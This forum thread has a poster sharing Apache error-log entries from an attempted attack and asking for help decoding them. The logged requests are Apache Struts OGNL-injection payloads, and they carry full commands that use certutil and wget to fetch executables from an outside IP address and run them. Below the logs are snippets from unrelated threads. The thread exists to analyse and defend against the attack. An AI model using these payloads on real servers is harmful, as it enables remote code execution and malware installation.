Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: Web Hack Attempt from whois 209.126.68.6
Special Forums Cybersecurity Web Hack Attempt from whois 209.126.68.6 Post 303026085 by Neo on Monday 19th of November 2018 10:56:05 PM
Old 11-19-2018
Web Hack Attempt from whois 209.126.68.6
Anyone care to take a stab at decoding this hack attempt on a web server. From the error logs:

Code:
$ cat error.log

Code:
[Mon Nov 19 18:56:44.614122 2018] [core:error] [pid 1211] (36)File name too long: [client 209.126.68.6:45105] AH00036: access to /${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('certutil.exe -urlcache -split -f http://111.90.158.225/d/fast.exe c:/fast.exe&cmd.exe /c c:\\\\fast.exe').getInputStream()))).(#w.close())}/index.action failed (filesystem path '/var/www/${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('certutil.exe -urlcache -split -f http:')
[Mon Nov 19 18:56:44.641285 2018] [core:error] [pid 1268] (36)File name too long: [client 209.126.68.6:45119] AH00036: access to /${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('certutil.exe -urlcache -split -f http://111.90.158.225/d/fast.exe c:/fast.exe&cmd.exe /c c:\\\\fast.exe').getInputStream()))).(#w.close())}/index.action failed (filesystem path '/var/www/${(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('certutil.exe -urlcache -split -f http:')
[Mon Nov 19 18:56:44.669095 2018] [core:error] [pid 3624] (36)File name too long: [client 209.126.68.6:45134] AH00036: access to /${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('nohup uname --m|grep x86_64 >> /dev/null || (pkill loop ; wget -O .loop http://111.90.158.225/d/ft32 && chmod 777 .loop && ./.loop)&&(pkill loop ; wget -O .loop http://111.90.158.225/d/ft64 && chmod 777 .loop && ./.loop) &').getInputStream()))).(#w.close())}/index.action failed (filesystem path '/var/www/${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('nohup uname --m|grep x86_64 >> ')

Examine carefully in code above including this executable file in the code:

Code:
 wget -O .loop http://111.90.158.225/d/ft32

and

Code:
wget -O .loop http://111.90.158.225/d/ft64

 

4 More Discussions You Might Find Interesting

1. AIX

ar: 0707-126

Trying to build code on IBM_AIX 5.3. Following error occured during build. ar: 0707-126 $projdir/obj/ibm/5.3/NewApp/NewApp.o is not valid with the current object file mode. Use the -X option to specify the desired object mode. ANy help is appreciated to resolve the error. (2 Replies)
Discussion started by: milindb
2 Replies

2. UNIX for Advanced & Expert Users

Exit Status 126 - how to get rid of it

Hi All, I have a small application hosted on apache-tomcat 5. Basically its a html page which in turn calls a perl script residing on unix server. Through this perl script i am calling a shell script using system command , like system('scriptname.sh',arg1,arg2,arg3); Now in the script... (5 Replies)
Discussion started by: glamo_2312
5 Replies

3. Shell Programming and Scripting

whois country help

Hello folks, I have list of ips like 1.1.1.1 2.2.2.2 3.3.3.3 4.4.4.4 whois 1.1.1.1 |grep -E 'country|Country' it show country=US or whatever. so i have number of ips in text file, how i can use above script to automate output like 1.1.1.1 US 2.2.2.2 CA 3.3.3.3 FR (3 Replies)
Discussion started by: learnbash
3 Replies

4. Shell Programming and Scripting

SFTP return Error Code 126

Hi, We are getting the following error code while connection remote server using sftp command. sftp user@serrver Warning: child process (/opt/ssh2/bin/ssh2) exited with code 126. pls Advise. (2 Replies)
Discussion started by: koti_rama
2 Replies
All times are GMT -4. The time now is 08:34 AM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy